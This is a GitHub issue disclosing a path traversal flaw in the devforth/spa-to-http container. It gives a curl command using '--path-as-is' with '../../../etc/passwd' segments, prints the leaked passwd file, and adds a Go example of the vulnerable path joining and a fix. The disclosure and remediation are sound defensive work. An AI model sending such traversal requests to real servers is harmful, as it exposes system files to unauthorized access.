Path Traversal Vulnerability in devforth/spa-to-http #14

Open
sunaley opened this issue Jun 21, 2024 · 0 comments
Comments


sunaley commented Jun 21, 2024

Description:

I have identified a path traversal vulnerability in the devforth/spa-to-http:latest Docker container. This vulnerability allows an attacker to access sensitive files on the container system.

Steps to Reproduce:

  1. Run the Docker container:
     sudo docker run --rm -p 8888:8080 -d devforth/spa-to-http:latest
  2. Execute the following curl command:
     curl --path-as-is http://127.0.0.1:8888/../../../etc/passwd

You will see the contents of the /etc/passwd file:

    root:x:0:0:root:/root:/bin/ash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/mail:/sbin/nologin
    news:x:9:13:news:/usr/lib/news:/sbin/nologin
    uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
    operator:x:11:0:operator:/root:/sbin/nologin
    man:x:13:15:man:/usr/man:/sbin/nologin
    postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
    cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
    ftp:x:21:21::/var/lib/ftp:/sbin/nologin
    sshd:x:22:22:sshd:/dev/null:/sbin/nologin
    at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
    squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
    xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
    games:x:35:35:games:/usr/games:/sbin/nologin
    cyrus:x:85:12::/usr/cyrus:/sbin/nologin
    vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
    ntp:x:123:123:NTP:/var/empty:/sbin/nologin
    smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
    guest:x:405:100:guest:/dev/null:/sbin/nologin
    nobody:x:65534:65534:nobody:/:/sbin/nologin

Expected Behavior:

The application should not allow access to files outside of the intended directory.

Actual Behavior:

The application allows traversal outside the intended directory, exposing sensitive files on the host system.

Environment:

Docker version: Docker version 24.0.7, build afdd53b
OS: Rocky Linux release 9.2 (Blue Onyx)

Additional Context:

Please address this vulnerability to prevent unauthorized access to sensitive files.

Thank you for your attention to this matter.
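
The bug pattern behind the report, and the check that closes it, as an added Go example (this is illustrative code written for this page, not spa-to-http's own code, and it makes no claim about how that project resolves paths). The root `/app/dist` and the function names are assumptions. `resolveNaive` concatenates the request path onto the root, which is exactly what lets the `..` segments that `curl --path-as-is` leaves in the request walk out of the root; `resolveSafe` cleans the request as a rooted URL path first, so every `..` is consumed against `/`, and `withinRoot` is an independent containment check that uses `filepath.Rel` instead of a string-prefix test.

```go
package main

import (
	"errors"
	"fmt"
	"path"
	"path/filepath"
	"strings"
)

// ErrOutsideRoot is returned when a request would be served from outside the
// document root.
var ErrOutsideRoot = errors.New("request resolves outside the document root")

// resolveNaive is the bug pattern the report describes, written out as a
// hypothetical illustration (not claimed to be spa-to-http's code): the URL
// path is glued onto the root with no normalisation, so "/../../../etc/passwd"
// becomes "/app/dist/../../../etc/passwd", which the kernel resolves to
// /etc/passwd.
func resolveNaive(root, reqPath string) string {
	return root + reqPath
}

// withinRoot reports whether candidate, once lexically cleaned, still lies
// under root. filepath.Rel is used rather than strings.HasPrefix so that a
// sibling directory such as /app/distx is not mistaken for /app/dist.
func withinRoot(root, candidate string) bool {
	rel, err := filepath.Rel(filepath.Clean(root), filepath.Clean(candidate))
	if err != nil {
		return false
	}
	sep := string(filepath.Separator)
	return rel != ".." && !strings.HasPrefix(rel, ".."+sep)
}

// resolveSafe normalises the request path as a rooted URL path before joining
// it to root, so every ".." is consumed against "/" and cannot climb above the
// root. The withinRoot check is kept as a second, independent guard.
func resolveSafe(root, reqPath string) (string, error) {
	clean := path.Clean("/" + reqPath)
	full := filepath.Join(root, filepath.FromSlash(clean))
	if !withinRoot(root, full) {
		return "", ErrOutsideRoot
	}
	return full, nil
}

func main() {
	root := "/app/dist"           // assumed document root (hypothetical)
	req := "/../../../etc/passwd" // the request path from the report
	naive := resolveNaive(root, req)
	fmt.Printf("naive: %s -> %s (inside root: %v)\n",
		naive, filepath.Clean(naive), withinRoot(root, naive))
	full, err := resolveSafe(root, req)
	fmt.Printf("safe:  %s, err=%v\n", full, err)
}
```

Two caveats worth keeping in mind when applying this to a real server: the cleaning must run on the decoded path (Go's `net/http` decodes `%2e%2e` into `..` before the handler sees `r.URL.Path`, so cleaning that value covers the encoded form too), and it is purely lexical, so a symlink inside the root that points outside it still needs a separate `os.Lstat` or `filepath.EvalSymlinks` check.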
